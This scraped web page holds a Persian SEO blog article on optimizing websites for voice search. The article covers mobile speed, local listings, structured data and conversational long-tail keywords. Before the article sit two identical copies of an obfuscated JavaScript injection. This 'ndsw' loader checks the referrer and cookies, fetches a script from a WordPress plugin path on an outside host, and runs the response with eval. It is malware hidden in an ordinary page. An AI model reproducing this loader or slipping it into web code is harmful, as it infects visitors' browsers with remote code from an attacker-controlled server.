;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

بهترین استراتژی ها برای سازگاری جستجوگرها برای جستجوی VOICE

بدون شک جستجوی صوتی در حال تبدیل شدن به یکی از جدیدترین روندهای رفتار آنلاین و احتمالاً موردی است که تأثیر عمیقی بر بهینه سازی سئو خواهد داشت. گرچه در سال 2009 شروع بسیار سنگینی را پشت سر گذاشت، جستجوی صوتی در دهه گذشته دچار تغییرات و پیشرفتهای چشمگیری شد و سومین روند جستجوگرها در سال 2017 بود. طبق گفته فوربس ، تا سال 2020 ، 50٪ از جستجوی آنلاین با استفاده گزینه جستجو از صدا انجام می شود.

شما احتمالاً سؤال می کنید چه چیزی در مورد جستجوی صوتی بسیار ویژه است ، چگونه رشد آن بر تکنیک های سئو تأثیر می گذارد و مهمتر از همه ، برای اطمینان از مزایای استفاده از ترافیک وب سایت خود ، چه اقداماتی را باید انجام دهید. خوب ، تمام پاسخ های مورد نیاز شما در اینجا است.
جستجوگرها و جستجو VOICE – چگونه می توانم صدای خود را بشنوید؟
برای ایجاد یک استراتژی موفق SEO ، بسیار مهم است که بدانید چرا جستجوی صوتی چنین پیشرفتی را تجربه کرده است ، و اینکه چگونه این نوع رفتار آنلاین روی صفحات نتایج موتور جستجو (SERPs) تأثیر می گذارد ، به خصوص اگر در حال دستیابی به نتایج ارگانیک باشید روش های مختلفی برای بهینه سازی وب سایت شما متناسب با این روند جدید وجود دارد و هنوز هم آن را بر روی نیازها و انتظارات مشتریانتان متمرکز می کنید.
برای دانستن جستجوی صوت آماده شوید
عملیاتی مبتنی بر تشخیص گفتار ، جستجوی صوتی به کاربران خود اجازه می دهد تا تجربه جستجو بدون علامت را در اختیار کاربران خود قرار دهند ایده آل برای موقعیت هایی که افراد در حال حرکت هستند ، یا هنگامی که آنها به یکباره به اطلاعات خاصی نیاز دارند. تحقیقات نشان می دهد که فقط نوجوانان از آن استفاده نمی کنند بلکه بزرگسالان و بزرگان نیز استفاده می کنند. امروزه برنامه های تشخیص صدا مانند Siri ، Google Assistant و Microsoft Cortana از تجربه مرور اینترنت هستند.
حتی اگر هدف از هر دو روش تایپ کردن و جستجوی صوتی ، یافتن چیزی باشد ، روشهایی که کاربران با استفاده از این دو گزینه به جستجوی اطلاعات می پردازند اساساً متفاوت هستند. این تمایزها برای شیوه های سئو چیست؟

VOICE- دوستانه MOBILE- دوستانه
سازگاری تلفن همراه سالهاست که یکی از ضروریات سئو محسوب می شود ، زیرا دسک تاپ به آرامی اما مطمئناً مسابقه در ترافیک اینترنت را نسبت به دستگاه های همراه راحت تر از دست می دهد. علاوه بر این ، اکثر جستجوهای صوتی از طریق دستگاه های تلفن همراه انجام می شوند ، بنابراین هرگز مهم نیست که اهمیت ساخت وب سایت خود را با تلفن همراه برجسته کنید.
به طور مشابه با تایپ سنتی ، روش جستجوی صوتی از بارگیری سریع وب سایت ها ، با حداقل زمان پاسخگویی سرور ، تصاویر و متن بهینه شده و فایل های فشرده شده استفاده می کند. بنابراین ، اطمینان حاصل کنید که وب سایت شما به طور مرتب بر روی دسک تاپ و موبایل کار می کند.
محلی عمل کنید – جهانی فکر کنید
تقریبا 25٪ از جستجوی صوتی به سمت محتوا مبتنی بر مکان هستند. بنابراین ، اگر صاحب مشاغل محلی هستید ، برنامه SEO شما باید به گونه‌ای باشد که مشتریان را در نزدیکی شما هدف قرار دهد. مراجعه به نشانه ها ، مؤسسات نزدیک ، یا اضافه کردن یک عبارت ساده “در نزدیکی من” به کلمات کلیدی شما می تواند برای دید آنلاین وب سایت شما شگفتی کند.

راه اندازی Google My Business یک ایده عالی دیگر است ، زیرا این ابزار به شما امکان می دهد مجموعه ای از اطلاعات مربوط به مشتریان بالقوه خود را اضافه کنید. به عنوان مثال ، پس از تأیید مالکیت خود ، می توانید آدرس ، شماره تلفن ، ساعات کار ، عکس ، نشانی اینترنتی وب سایت ، خدماتی که ارائه می دهید و منطقه مورد نظر خود را ارائه دهید ، ویژگیهایی مانند دسترسی صندلی چرخدار یا وای فای رایگان را اضافه کنید.

از آنجا که جستجوی صوتی بسیار دقیق است (“کدام داروخانه 24/7 کار می کند؟” ) ، تا آنجا که ممکن است جزئیات را جستجو کنید.

قدم زدن در راه های کوچک است زیرا مهم است که ابتدا تجارت خود را در سطح محلی مستقر کنید. از آنجا ، رشد و جذب مشتری جدید برای تجارت شما آسان تر خواهد بود ، زیرا در حال حاضر ارتش از مشتری های وفادار خواهید داشت.
هدف برای نشانه گذاری ها
بر خلاف روش تایپ ، که تعداد زیادی وب سایت را مطابق با درخواست کاربر لیست می کند ، جستجوی صوتی به همان اندازه سخاوتمندانه نیست. اگر شخصی از دستیار جستجوی صوتی استفاده کند ، بعید است که بتواند عمیق تر به نتایج جستجو بپیوندد ، بنابراین مهم است که در صدر صفحه نتایج قرار بگیرید.

متأسفانه ، هیچ دستورالعمل موفقی وجود ندارد که بتواند موقعیت برتر وب سایت شما را تضمین کند ، اما از جمله داده های ساخت یافته به کد شما HTML مطلوب است ، زیرا این امر به موتورهای جستجو اجازه می دهد تا مطالب شما را راحت تر مطالعه کنند. همچنین ، نشانه‌گذاری اسنایپست به شما امکان کنترل بیشتر در مورد ارائه اطلاعات مربوط به شغل خود را می‌دهد.

عبارات را وارد کنید و کلید واژه های خود را تأیید کنید

تایپ کردن دو یا سه کلمه کلیدی ، اصطلاحات کوتاه ، روشی استاندارد و کاربرپسند برای جستجوی اطلاعات سنتی آنلاین است. به عنوان مثال ، “اسکار بهترین بازیگر زن” نتیجه مطلوب را کسب می کند – نام برنده ، لیست نامزد ، عکس در مراسم اهدای جوایز ، عنوان فیلم و سایر اطلاعات بالقوه مرتبط.

با این حال ، در جستجوی صوتی ، مردم گویا با انسان دیگری صحبت می کنند ، که در ساختارهای زبانی که برای جستجوی آنلاین استفاده می کنند ، منعکس می شود. به طور کلی ، جستجو کنندگان صدا به احتمال زیاد از سبک مکالمه استفاده می کنند ، یعنی آنها به دنبال عبارت های طولانی تر ، ساختارهای کامل گرامری یا حتی جملات و سؤالات کامل می روند. برخی از افراد سؤالات خود را با سلام کردن ، مانند “سلام Google” یا “Ok Siri” شروع می کنند ، که درباره نحوه تغییر ادراک از وسایل مورد علاقه ما صحبت می کند. بنابراین ، روند جستجوی صوتی نحوه ایجاد جستجوهایمان را تغییر می دهد و احتمالاً چیزی شبیه به “چه کسی اسکار بهترین بازیگر زن امسال را بدست آورد؟”

بنابراین ، کلمات کلیدی دم بلند ، از شش تا ده کلمه ، به روشی که مردم از آن صحبت می کنند ، بهترین استراتژی SEO برای سازگاری با تغییر جستجوی صوتی است. نتایج جستجوهای صوتی معمولاً در سطح خواندن 15 سال نوشته شده است ، بنابراین ، اطمینان حاصل کنید که عبارات شما کوتاه ، ساده و قابل فهم باشد ، مهم نیست که چقدر محتوای شما پیچیده است.

با این حال ، برخی از دستورالعمل های عمومی برای بهینه سازی سئو ، صرف نظر از روند اساسی ، هنوز هم وجود دارد. بنابراین ، به جای اینکه وب سایت خود را با کلمات کلیدی بیش از حد ، که می تواند موتورهای جستجو را به سمت پرچم گذاری هرزنامه سوق دهد ، مطمئن شوید که کلمات کلیدی شما مرتبط ، به نقطه و صدایی طبیعی هستند.
راهی را که صحبت می کنید بنویسید
سبک مکالمه نمایش داده های صوتی زمینه ایجاد تغییرات اساسی در خود محتوای وب سایت را فراهم می آورد. به عبارت دیگر ، استراتژی SEO شما باید در پاسخ به سؤالات کاربران به شیوه ای طبیعی صحبت کند. محتوای وب سایت خود را با تمرکز بر روی پنج Ws و یک H (چه کسی ، چه ، چه زمانی ، کجا ، چرا و چگونه) یا “هرم وارونه” بنویسید (ابتدا یک جواب روشن ، سپس داده های اضافی ، جزئیات و سوالات بعدی).

جمع بندی …
جستجوی صوتی روندی است که در حوزه فناوری و اینترنت بسیار کاربر پسند ، بی دردسر و گسترده است. اگرچه چندین سال طول کشید تا این ویژگی شتاب بیشتری کسب کند ، اما جستجوی صوتی اکنون به عنوان ابزاری مبتکر و خوب توسعه یافته شناخته شده است ، که دامنه های استفاده باید بیشتر گسترش یابد.

البته نمی توان پیش بینی کرد که آیا روش های جستجوی سنتی به نفع جستجوی صوتی ناپدید می شوند ، اما یک چیز مسلم است – جستجوی صوتی به طور بنیادی بر استراتژی های سئو تأثیر می گذارد. حتی اگر هنوز به حوزه تجارت شما نرسیده باشد ، در آینده نه چندان دور مسلماً چنین خواهد کرد.

بنابراین ، آنچه شما می توانید انجام دهید برای انطباق راهبردهای SEO خود برای جستجوی صوتی است:

سازگار با موبایل باشد
اطمینان از بارگیری سریع وب سایت
از محتوای مبتنی بر مکان استفاده کنید
داده های خود را ساختار دهید
نشانه گذاری طرحواره را اعمال کنید
کلمات کلیدی دم بلند را انتخاب کنید
محتوای مکالمه را بنویسید
با درج این ایده ها در استراتژی های بهینه سازی محتوای موجود ، وب سایت شما را برای مهار تازگی های ترافیک صوتی آماده می کند و به همه سؤال های سوزناک مشتری شما پاسخ می دهد.

مقاله های بیشتر

طراحی وب

فریم ورک چیست ؟

فریم ورک FrameWork که در اصطلاح یک چارچوب نرم افزاری گفته می شود مجموعه ای است از کتابخانه های برنامه نویسی و احتمالا مجموعه ای